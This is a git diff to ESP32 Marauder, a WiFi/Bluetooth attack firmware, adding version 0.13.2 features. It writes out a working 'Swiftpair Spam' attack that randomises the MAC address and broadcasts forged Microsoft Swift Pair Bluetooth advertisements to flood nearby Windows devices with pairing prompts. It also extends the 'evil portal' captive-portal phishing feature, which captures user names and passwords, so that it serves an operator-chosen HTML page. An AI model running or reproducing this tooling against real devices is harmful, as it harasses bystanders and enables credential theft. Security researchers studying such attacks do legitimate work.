diff --git a/README.md b/README.md
index bc3f949f6..80b352255 100644
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
-# ESP32 Marauder v0.13.1
+# ESP32 Marauder v0.13.2
A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32
diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp
index c4ac82fca..0ccaa9d70 100644
--- a/esp32_marauder/CommandLine.cpp
+++ b/esp32_marauder/CommandLine.cpp
@@ -250,6 +250,7 @@ void CommandLine::runCommand(String input) {
#ifdef HAS_BT
Serial.println(HELP_BT_SNIFF_CMD);
Serial.println(HELP_BT_SOUR_APPLE_CMD);
+ Serial.println(HELP_BT_SWIFTPAIR_SPAM_CMD);
#ifdef HAS_GPS
Serial.println(HELP_BT_WARDRIVE_CMD);
#endif
@@ -482,6 +483,7 @@ void CommandLine::runCommand(String input) {
// AP Scan
else if (cmd_args.get(0) == EVIL_PORTAL_CMD) {
int cmd_sw = this->argSearch(&cmd_args, "-c");
+ int html_sw = this->argSearch(&cmd_args, "-w");
if (cmd_sw != -1) {
String et_command = cmd_args.get(cmd_sw + 1);
@@ -491,6 +493,14 @@ void CommandLine::runCommand(String input) {
display_obj.clearScreen();
menu_function_obj.drawStatusBar();
#endif
+ if (html_sw != -1) {
+ String target_html_name = cmd_args.get(html_sw + 1);
+ evil_portal_obj.target_html_name = target_html_name;
+ Serial.println("Set html file as " + evil_portal_obj.target_html_name);
+ }
+ //else {
+ // evil_portal_obj.target_html_name = "index.html";
+ //}
wifi_scan_obj.StartScan(WIFI_SCAN_EVIL_PORTAL, TFT_MAGENTA);
}
else if (et_command == "reset") {
@@ -500,7 +510,9 @@ void CommandLine::runCommand(String input) {
}
else if (et_command == "sethtml") {
-
+ String target_html_name = cmd_args.get(cmd_sw + 2);
+ evil_portal_obj.target_html_name = target_html_name;
+ Serial.println("Set html file as " + evil_portal_obj.target_html_name);
}
else if (et_command == "setap") {
@@ -784,6 +796,18 @@ void CommandLine::runCommand(String input) {
Serial.println("Bluetooth not supported");
#endif
}
+ else if (cmd_args.get(0) == BT_SWIFTPAIR_SPAM_CMD) {
+ #ifdef HAS_BT
+ Serial.println("Starting Swiftpair Spam attack. Stop with " + (String)STOPSCAN_CMD);
+ #ifdef HAS_SCREEN
+ display_obj.clearScreen();
+ menu_function_obj.drawStatusBar();
+ #endif
+ wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN);
+ #else
+ Serial.println("Bluetooth not supported");
+ #endif
+ }
// Wardrive
else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
#ifdef HAS_BT
diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h
index 157e57973..c2bff8b1f 100644
--- a/esp32_marauder/CommandLine.h
+++ b/esp32_marauder/CommandLine.h
@@ -78,6 +78,7 @@ const char PROGMEM SSID_CMD[] = "ssid";
// Bluetooth sniff/scan
const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
+const char PROGMEM BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair";
const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
@@ -96,7 +97,7 @@ const char PROGMEM HELP_GPS_DATA_CMD[] = "gpsdata";
const char PROGMEM HELP_GPS_CMD[] = "gps [-g] ";
// WiFi sniff/scan
-const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start]";
+const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start [-w html.html]/sethtml ]";
const char PROGMEM HELP_SIGSTREN_CMD[] = "sigmon";
const char PROGMEM HELP_SCANAP_CMD[] = "scanap";
const char PROGMEM HELP_SCANSTA_CMD[] = "scansta";
@@ -124,6 +125,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r ";
// Bluetooth sniff/scan
const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
+const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair";
const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
const char PROGMEM HELP_FOOT[] = "==================================";
diff --git a/esp32_marauder/EvilPortal.cpp b/esp32_marauder/EvilPortal.cpp
index 86c5b8c26..c55b783c5 100644
--- a/esp32_marauder/EvilPortal.cpp
+++ b/esp32_marauder/EvilPortal.cpp
@@ -65,7 +65,7 @@ void EvilPortal::setupServer() {
bool EvilPortal::setHtml() {
Serial.println("Setting HTML...");
#ifndef WRITE_PACKETS_SERIAL
- File html_file = sd_obj.getFile("/index.html");
+ File html_file = sd_obj.getFile("/" + this->target_html_name);
if (!html_file) {
#ifdef HAS_SCREEN
this->sendToDisplay("Could not find /index.html.");
diff --git a/esp32_marauder/EvilPortal.h b/esp32_marauder/EvilPortal.h
index 2e8923d68..19e3f7cb9 100644
--- a/esp32_marauder/EvilPortal.h
+++ b/esp32_marauder/EvilPortal.h
@@ -99,6 +99,8 @@ class EvilPortal {
public:
EvilPortal();
+ String target_html_name = "index.html";
+
String get_user_name();
String get_password();
void addLog(String log, int len);
diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp
index e5151bd60..05f1c4539 100644
--- a/esp32_marauder/MenuFunctions.cpp
+++ b/esp32_marauder/MenuFunctions.cpp
@@ -495,6 +495,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -552,6 +553,7 @@ void MenuFunctions::main(uint32_t currentTime)
(wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
(wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+ (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1419,6 +1421,11 @@ void MenuFunctions::RunSetup()
this->drawStatusBar();
wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
});
+ this->addNodes(&bluetoothAttackMenu, "Swiftpair Spam", TFT_CYAN, NULL, KEYBOARD_ICO, [this]() {
+ display_obj.clearScreen();
+ this->drawStatusBar();
+ wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN);
+ });
// Device menu
deviceMenu.parentMenu = &mainMenu;
diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index ce378554d..f03346ef2 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -17,6 +17,11 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
return 0;
}
+extern "C" {
+ uint8_t esp_base_mac_addr[6];
+ esp_err_t esp_ble_gap_set_rand_addr(const uint8_t *rand_addr);
+}
+
#ifdef HAS_BT
//ESP32 Sour Apple by RapierXbox
//Exploit by ECTO-1A
@@ -48,6 +53,37 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
return randomAdvertisementData;
}
+ NimBLEAdvertisementData getSwiftAdvertisementData() {
+ extern WiFiScan wifi_scan_obj;
+ NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
+ const char* display_name = wifi_scan_obj.generateRandomName();
+ uint8_t display_name_len = strlen(display_name);
+
+ uint8_t size = 7 + display_name_len;
+ uint8_t* packet = (uint8_t*)malloc(size);
+ uint8_t i = 0;
+
+ packet[i++] = size - 1; // Size
+ packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
+ packet[i++] = 0x06; // Company ID (Microsoft)
+ packet[i++] = 0x00; // ...
+ packet[i++] = 0x03; // Microsoft Beacon ID
+ packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
+ packet[i++] = 0x80; // Reserved RSSI Byte
+ for (int j = 0; j < display_name_len; j++) {
+ packet[i + j] = display_name[j];
+ }
+ i += display_name_len;
+
+ randomAdvertisementData.addData(std::string((char *)packet, size));
+
+ free(packet);
+
+ free((void*)display_name);
+
+ return randomAdvertisementData;
+ }
+
class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
void onResult(BLEAdvertisedDevice *advertisedDevice) {
@@ -447,6 +483,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
RunSourApple(scan_mode, color);
#endif
}
+ else if (scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) {
+ #ifdef HAS_BT
+ RunSwiftpairSpam(scan_mode, color);
+ #endif
+ }
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
@@ -611,6 +652,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
else if ((currentScanMode == BT_SCAN_ALL) ||
(currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+ (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
@@ -1407,6 +1449,46 @@ void WiFiScan::executeSourApple() {
#endif
}
+const char* WiFiScan::generateRandomName() {
+ const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ int len = rand() % 10 + 1; // Generate a random length between 1 and 10
+ char* randomName = (char*)malloc((len + 1) * sizeof(char)); // Allocate memory for the random name
+ for (int i = 0; i < len; ++i) {
+ randomName[i] = charset[rand() % strlen(charset)]; // Select random characters from the charset
+ }
+ randomName[len] = '\0'; // Null-terminate the string
+ return randomName;
+}
+
+void WiFiScan::generateRandomMac(uint8_t* mac) {
+ for (int i = 0; i < 6; i++) {
+ mac[i] = random(0, 255);
+ }
+}
+
+void WiFiScan::executeSwiftpairSpam() {
+ #ifdef HAS_BT
+ uint8_t macAddr[6];
+ generateRandomMac(macAddr);
+
+ esp_base_mac_addr_set(macAddr);
+
+ NimBLEDevice::init("");
+
+ NimBLEServer *pServer = NimBLEDevice::createServer();
+
+ pAdvertising = pServer->getAdvertising();
+
+ NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+ pAdvertising->setAdvertisementData(advertisementData);
+ pAdvertising->start();
+ delay(10);
+ pAdvertising->stop();
+
+ NimBLEDevice::deinit();
+ #endif
+}
+
void WiFiScan::executeWarDrive() {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
@@ -1781,6 +1863,26 @@ void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
#endif
}
+void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) {
+ #ifdef HAS_BT
+ #ifdef HAS_SCREEN
+ display_obj.TOP_FIXED_AREA_2 = 48;
+ display_obj.tteBar = true;
+ display_obj.print_delay_1 = 15;
+ display_obj.print_delay_2 = 10;
+ display_obj.initScrollValues(true);
+ display_obj.tft.setTextWrap(false);
+ display_obj.tft.setTextColor(TFT_BLACK, color);
+ display_obj.tft.fillRect(0,16,240,16, color);
+ display_obj.tft.drawCentreString("Swiftpair Spam",120,16,2);
+ display_obj.touchToExit();
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ #endif
+
+ this->ble_initialized;
+ #endif
+}
+
// Function to start running any BLE scan
void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
{
@@ -4125,6 +4227,25 @@ void WiFiScan::main(uint32_t currentTime)
this->executeSourApple();
#endif
}
+ else if (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) {
+ #ifdef HAS_BT
+ if (currentTime - initTime >= 1000) {
+ initTime = millis();
+ String displayString = "";
+ String displayString2 = "";
+ displayString.concat("Advertising Data...");
+ for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
+ displayString2.concat(" ");
+ #ifdef HAS_SCREEN
+ display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+ display_obj.showCenterText(displayString2, 160);
+ display_obj.showCenterText(displayString, 160);
+ #endif
+ }
+
+ this->executeSwiftpairSpam();
+ #endif
+ }
else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
if (currentTime - initTime >= this->channel_hop_delay * 1000)
{
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
index 6392388e6..b84856be6 100644
--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -82,6 +82,7 @@
#define BT_SCAN_WAR_DRIVE 34
#define BT_SCAN_WAR_DRIVE_CONT 35
#define BT_ATTACK_SOUR_APPLE 36
+#define BT_ATTACK_SWIFTPAIR_SPAM 37
#define GRAPH_REFRESH 100
@@ -251,7 +252,9 @@ class WiFiScan
void clearMacHistory();
void executeWarDrive();
void executeSourApple();
+ void executeSwiftpairSpam();
void startWardriverWiFi();
+ void generateRandomMac(uint8_t* mac);
void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
@@ -284,6 +287,7 @@ class WiFiScan
void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
void RunSourApple(uint8_t scan_mode, uint16_t color);
+ void RunSwiftpairSpam(uint8_t scan_mode, uint16_t color);
void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
void RunEvilPortal(uint8_t scan_mode, uint16_t color);
bool checkMem();
@@ -346,6 +350,7 @@ class WiFiScan
void main(uint32_t currentTime);
void StartScan(uint8_t scan_mode, uint16_t color = 0);
void StopScan(uint8_t scan_mode);
+ const char* generateRandomName();
//void addLog(String log, int len);
static void getMAC(char *addr, uint8_t* data, uint16_t offset);
diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h
index 8991d2b1a..af53a9893 100644
--- a/esp32_marauder/configs.h
+++ b/esp32_marauder/configs.h
@@ -22,7 +22,7 @@
//#define XIAO_ESP32_S3
//// END BOARD TARGETS
- #define MARAUDER_VERSION "v0.13.1"
+ #define MARAUDER_VERSION "v0.13.2"
//// BOARD FEATURES
#ifdef MARAUDER_M5STICKC